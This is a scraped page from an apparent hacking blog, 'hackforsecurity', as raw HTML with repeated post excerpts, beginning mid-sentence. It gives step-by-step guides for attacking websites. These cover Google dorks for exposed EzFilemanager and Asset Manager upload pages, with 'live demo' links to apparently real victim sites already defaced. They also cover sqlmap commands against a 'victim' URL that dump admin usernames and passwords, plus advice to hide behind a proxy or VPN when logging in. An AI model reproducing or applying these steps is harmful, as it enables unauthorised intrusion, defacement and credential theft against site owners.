website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php and</span></div><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><span style="background-color: white;">put ?<b>sa=1&type=file</b> after URL</span></div><div align="left" style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><span style="background-color: white;">now url will be : <a href="http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file" style="color: #6c0e11; text-decoration: none;">http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file</a><br />now see the upload option and you can upload ,html ,pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files</span></div><div align="left" style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><span style="background-color: white;"><a href="http://www.monumentbiblechurch.com/administration/jscripts/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file" style="color: #6c0e11; text-decoration: none;">live Demo</a><br /><a href="http://www.monumentbiblechurch.com/mbcphotos/files/readmore.txt" style="color: #6c0e11; text-decoration: none;">result</a></span></div><span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;">- See more at: http://www.hackforsecurity.net/2012/01/ezfilemanager-deface-upload.html#sthash.YEbHKvWY.dpuf</span>

EzFilemanager Deface Upload Vulnerability

Google dork for EzFilemanager is “ inurl:ezfilemanager/ezfilemanager.php ”(you can modify this dork for getting mor results from Google )Exploit : http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfil…

07 Sep 2013

WordPress Remote File Upload Vulnerability with Asset Manager Hack Web sites

<div align="justify" style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><span style="background-color: white;"><b>In <a href="http://hackforsecurity.blogspot.in/search/label/WordPress" style="color: #6c0e11; text-decoration: none;">WordPress</a> we can upload our deface page using Remote File Upload <a href="http://hackforsecurity.blogspot.in/search/label/vulnerability" style="color: #6c0e11; text-decoration: none;">Vulnerability</a> with Asset Manager. Asset Manager is a plugin that allows you to upload your files Just simply follow the simple steps to hack the <a href="http://hackforsecurity.blogspot.in/search/label/WordPress" style="color: #6c0e11; text-decoration: none;">wordpress</a> website.<br />1. Open google and search <em>inurl:Editor/assetmanager/assetmanager.asp </em>2. Now open any result you will found look like bellow snapshot.<br />3. Just click on browse and upload your deface page. </b></span></div><div align="justify" style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><span style="background-color: white;"><b><br /></b></span></div><span style="background-color: white;"><a href="http://lh6.ggpht.com/-ONQdoQ7v6n8/T2o01wpoORI/AAAAAAAAAv0/zk_D4765GKg/s1600-h/wordpress%252520hacking%25255B3%25255D.png" style="color: #6c0e11; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px; text-decoration: none;"><img alt="wordpress hacking" border="0" height="168" src="http://lh5.ggpht.com/-hu3KOWfxOrs/T2o03GTCQHI/AAAAAAAAAv8/boQfWmHTyOw/wordpress%252520hacking_thumb%25255B1%25255D.png?imgmax=800" style="background-image: none; border: 0px; display: block; float: none; margin: 0px auto 4px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="wordpress hacking" width="608" /></a><span style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"></span></span><br /><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><span style="background-color: white;">Demo: <a href="http://www.dr-ravid.co.il/admin/editor/assetmanager/assetmanager.asp" style="color: #6c0e11; text-decoration: none;" target="_blank">Asset Manager</a> <a href="http://www.dr-ravid.co.il/admin/Editor/assets/hack%20for%20security.html" style="color: #6c0e11; text-decoration: none;" target="_blank">Deface page</a></span></div><br />

WordPress Remote File Upload Vulnerability with Asset Manager Hack Web sites

In WordPress we can upload our deface page using Remote File Upload Vulnerability with Asset Manager. Asset Manager is a plugin that allows you to upload your files Just simply follow the simple steps…

07 Sep 2013

Hack website using Backtrack (sqlmap) Trick By 3Xp!r3 M!ND

<div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><span style="background-color: white;">In my previous tutorial I have explained what is <a href="http://hackforsecurity.blogspot.in/2012/07/what-is-backtrack.html" style="color: #6c0e11; text-decoration: none;" target="_blank">backtrack</a>, now in this tutorial I am going to show you how to hack website using Backtrack 5 (sqlmap). Sqlmap is a automatic sql injection tool which helps you to hack website easily. Follow the simple steps to hack website using backtrack 5 sqlmap tool.<br /><br />1. Open your backtrack terminal and type <strong><em>cd /pentest/database/sqlmap</em></strong> and hit enter. Now sqlmap is open in your terminal<a href="http://lh4.ggpht.com/-iz2rxqtV59o/UA6NuvHb-dI/AAAAAAAACR4/OiRZb6pqbUo/s1600-h/sql-map-13.png" style="color: #6c0e11; text-decoration: none;"><img alt="sql map 1" border="0" height="101" src="http://lh6.ggpht.com/-mSC2LYGSnQo/UA6N0pHpgpI/AAAAAAAACSA/hv-60OpaAek/sql-map-1_thumb1.png?imgmax=800" style="background-image: none; border-width: 0px; display: block; float: none; margin: 0px auto 4px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="sql map 1" width="614" /></a><br />2. Now find the vulnerable site. (well I already have vulnerable site)<br /><a href="http://lh3.ggpht.com/-0BrxNXfNea4/UA6N3WN7KmI/AAAAAAAACSI/_U-WMHsx2Us/s1600-h/sql-map-2-3.png" style="color: #6c0e11; text-decoration: none;"><img alt="sql map 2 " border="0" height="117" src="http://lh4.ggpht.com/-BqIRHIXaKFc/UA6N9XLYDeI/AAAAAAAACSQ/MaCK7hOe3iQ/sql-map-2-_thumb1.png?imgmax=800" style="background-image: none; border-width: 0px; display: block; float: none; margin: 0px auto 4px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="sql map 2 " width="620" /></a><br />3. Now type this command in the terminal and hit enter.(refer above figure)</span></div><blockquote style="background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9K8WWuJ7Rnxhxglnj_EbxHLXFcWo2JvxPEZ9v7-fhOVdMe481BzsjgM7nGlDLwrkcnonH8O1WhAWXto9HWhjV67SI2xhMHw2fDBn8leHzMf3wZjwOLyC15tGT146lnZ7xpK1uzc9d86Z9/s1600/quote.png); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(232, 232, 232); border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-bottom-style: solid; border-bottom-width: 1px; border-top-left-radius: 6px; border-top-right-radius: 6px; color: #666666; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px; font-style: italic; height: 25px; line-height: 30px; margin: 20px; padding: 20px 20px 9px 30px; width: 590px;"><span style="background-color: white;">python sqlmap.py -u <a href="http://yourvictim%27slink/index.php?id=4" style="color: #6c0e11; text-decoration: none;">http://yourvictim'slink/index.php?id=4</a> –dbs</span></blockquote><span style="background-color: white;"><br style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;" /><span style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;">4. Now you will get the database name of the website </span></span><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><a href="http://lh6.ggpht.com/-tPdO_8jQuaI/UA6ODQTOFLI/AAAAAAAACSY/2hjN008mn-8/s1600-h/sql-map-33.png" style="background-color: white; color: #6c0e11; text-decoration: none;"><img alt="sql map 3" border="0" height="223" src="http://lh4.ggpht.com/-EcmfcbZbw0A/UA6OE8NurOI/AAAAAAAACSg/WAOO4OHpc6A/sql-map-3_thumb1.png?imgmax=800" style="background-image: none; border-width: 0px; display: block; float: none; margin: 0px auto 4px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="sql map 3" width="622" /></a></div><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><span style="background-color: white;">Well I got the two database <strong>aj</strong> and <strong>information_schema</strong> we will select aj database.<br /><br />5. Now get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.</span></div><blockquote style="background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9K8WWuJ7Rnxhxglnj_EbxHLXFcWo2JvxPEZ9v7-fhOVdMe481BzsjgM7nGlDLwrkcnonH8O1WhAWXto9HWhjV67SI2xhMHw2fDBn8leHzMf3wZjwOLyC15tGT146lnZ7xpK1uzc9d86Z9/s1600/quote.png); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(232, 232, 232); border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-bottom-style: solid; border-bottom-width: 1px; border-top-left-radius: 6px; border-top-right-radius: 6px; color: #666666; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px; font-style: italic; height: 44px; line-height: 30px; margin: 20px; padding: 20px 20px 9px 30px; width: 590px;"><span style="background-color: white;">python sqlmap.py -u <a href="http://yourvictim%27slink/index.php?id=4" style="color: #6c0e11; text-decoration: none;">http://yourvictim'slink/index.php?id=4</a> -D  (database name) –tables</span></blockquote><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><span style="background-color: white;"><br />6. Now we need to grab the tables from the aj database. paste this command bellow command and hit enter.</span></div><blockquote style="background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9K8WWuJ7Rnxhxglnj_EbxHLXFcWo2JvxPEZ9v7-fhOVdMe481BzsjgM7nGlDLwrkcnonH8O1WhAWXto9HWhjV67SI2xhMHw2fDBn8leHzMf3wZjwOLyC15tGT146lnZ7xpK1uzc9d86Z9/s1600/quote.png); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(232, 232, 232); border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-bottom-style: solid; border-bottom-width: 1px; border-top-left-radius: 6px; border-top-right-radius: 6px; color: #666666; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px; font-style: italic; height: 48px; line-height: 30px; margin: 20px; padding: 20px 20px 9px 30px; width: 590px;"><span style="background-color: white;">python sqlmap.py -u <a href="http://www.yourvictim%27slink.com/index.php?id=4" style="color: #6c0e11; text-decoration: none;">http://www.yourvictim'slink.com/index.php?id=4</a> -D aj –tables</span></blockquote><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><br /></div><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><a href="http://lh3.ggpht.com/-urPCxOF-hI0/UA6OGFLs7xI/AAAAAAAACSo/Dxgpi4uXCSw/s1600-h/sql-map-44.png" style="background-color: white; color: #6c0e11; text-decoration: none;"><img alt="sql map 4" border="0" height="111" src="http://lh5.ggpht.com/-B8Eclp2Zxrw/UA6OHUgdyRI/AAAAAAAACSw/EcRawEdp0ng/sql-map-4_thumb2.png?imgmax=800" style="background-image: none; border-width: 0px; display: block; float: none; margin: 0px auto 4px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="sql map 4" width="618" /></a></div><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><span style="background-color: white;">7. Now you will get the tables list which is stored in aj database.<br /><a href="http://lh5.ggpht.com/-AvsePylHRIg/UA6OJ-_P3BI/AAAAAAAACS4/5oSP1Awq-4I/s1600-h/sql-map-54.png" style="color: #6c0e11; text-decoration: none;"><img alt="sql map 5" border="0" height="263" src="http://lh4.ggpht.com/-3xVRUVAGWhY/UA6OMB0p2LI/AAAAAAAACTA/-D3WZZki8Io/sql-map-5_thumb2.png?imgmax=800" style="background-image: none; border-width: 0px; display: block; float: none; margin: 0px auto 4px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="sql map 5" width="621" /></a></span></div><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><br /></div><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><span style="background-color: white;">8. Now lets grab the columns from the admin table </span></div><blockquote style="background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9K8WWuJ7Rnxhxglnj_EbxHLXFcWo2JvxPEZ9v7-fhOVdMe481BzsjgM7nGlDLwrkcnonH8O1WhAWXto9HWhjV67SI2xhMHw2fDBn8leHzMf3wZjwOLyC15tGT146lnZ7xpK1uzc9d86Z9/s1600/quote.png); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(232, 232, 232); border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-bottom-style: solid; border-bottom-width: 1px; border-top-left-radius: 6px; border-top-right-radius: 6px; color: #666666; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px; font-style: italic; height: 50px; line-height: 30px; margin: 20px; padding: 20px 20px 9px 30px; width: 590px;"><span style="background-color: white;">python sqlmap.py -u <a href="http://www.yourvictim%27slink.com/index.php?id=4" style="color: #6c0e11; text-decoration: none;">http://www.yourvictim'slink.com/index.php?id=4</a> -T admin --columns</span></blockquote><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><a href="http://lh5.ggpht.com/-bJ3WWDIDmbY/UA6ONfKlRoI/AAAAAAAACTI/qrrShem4dP0/s1600-h/sql%252520map%2525207%25255B3%25255D.png" style="background-color: white; color: #6c0e11; text-decoration: none;"><img alt="sql map 7" border="0" height="118" src="http://lh3.ggpht.com/-eENV89E67yo/UA6OOv_SzqI/AAAAAAAACTQ/rPhRWTCMN88/sql%252520map%2525207_thumb%25255B1%25255D.png?imgmax=800" style="background-image: none; border-width: 0px; display: block; float: none; margin: 0px auto 4px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="sql map 7" width="624" /></a></div><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><span style="background-color: white;">Now we got the columns and we got username and password<br />9. Now lets grab the passwords of the admin</span></div><blockquote style="background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9K8WWuJ7Rnxhxglnj_EbxHLXFcWo2JvxPEZ9v7-fhOVdMe481BzsjgM7nGlDLwrkcnonH8O1WhAWXto9HWhjV67SI2xhMHw2fDBn8leHzMf3wZjwOLyC15tGT146lnZ7xpK1uzc9d86Z9/s1600/quote.png); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(232, 232, 232); border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-bottom-style: solid; border-bottom-width: 1px; border-top-left-radius: 6px; border-top-right-radius: 6px; color: #666666; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px; font-style: italic; height: 48px; line-height: 30px; margin: 20px; padding: 20px 20px 9px 30px; width: 597px;"><span style="background-color: white;">python sqlmap.py -u <a href="http://www.yourvictim%27slink.com/index.php?id=4" style="color: #6c0e11; text-decoration: none;">http://www.yourvictim'slink.com/index.php?id=4</a> -T admin -U test --dump</span></blockquote><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><span style="background-color: white;">Now we got the username and the password of the website !<br /><a href="http://lh4.ggpht.com/-eYlL5XjUgqk/UA6OP5cOE2I/AAAAAAAACTY/CME2pakr-g0/s1600-h/sql%252520map%2525209%25255B3%25255D.png" style="color: #6c0e11; text-decoration: none;"><img alt="sql map 9" border="0" height="71" src="http://lh4.ggpht.com/-jQm5qeDcXEU/UA6ORwYqY5I/AAAAAAAACTg/JNbJhcsasCs/sql%252520map%2525209_thumb%25255B1%25255D.png?imgmax=800" style="background-image: none; border: 0px; display: block; float: none; margin: 0px auto 4px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="sql map 9" width="626" /></a></span></div><div style="color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 13px;"><span style="background-color: white;">Now just <a href="http://hackforsecurity.blogspot.in/2012/01/admin-finder-perl-script.html" style="color: #6c0e11; text-decoration: none;" target="_blank">find the admin penal</a> of the website and use proxy/vpn when you are trying to login in the website as a admin.</span></div>

Hack website using Backtrack (sqlmap) Trick By 3Xp!r3 M!ND

In my previous tutorial I have explained what is backtrack, now in this tutorial I am going to show you how to hack website using Backtrack 5 (sqlmap). Sqlmap is a automatic sql injection tool which h…

07 Sep 2013

Load more posts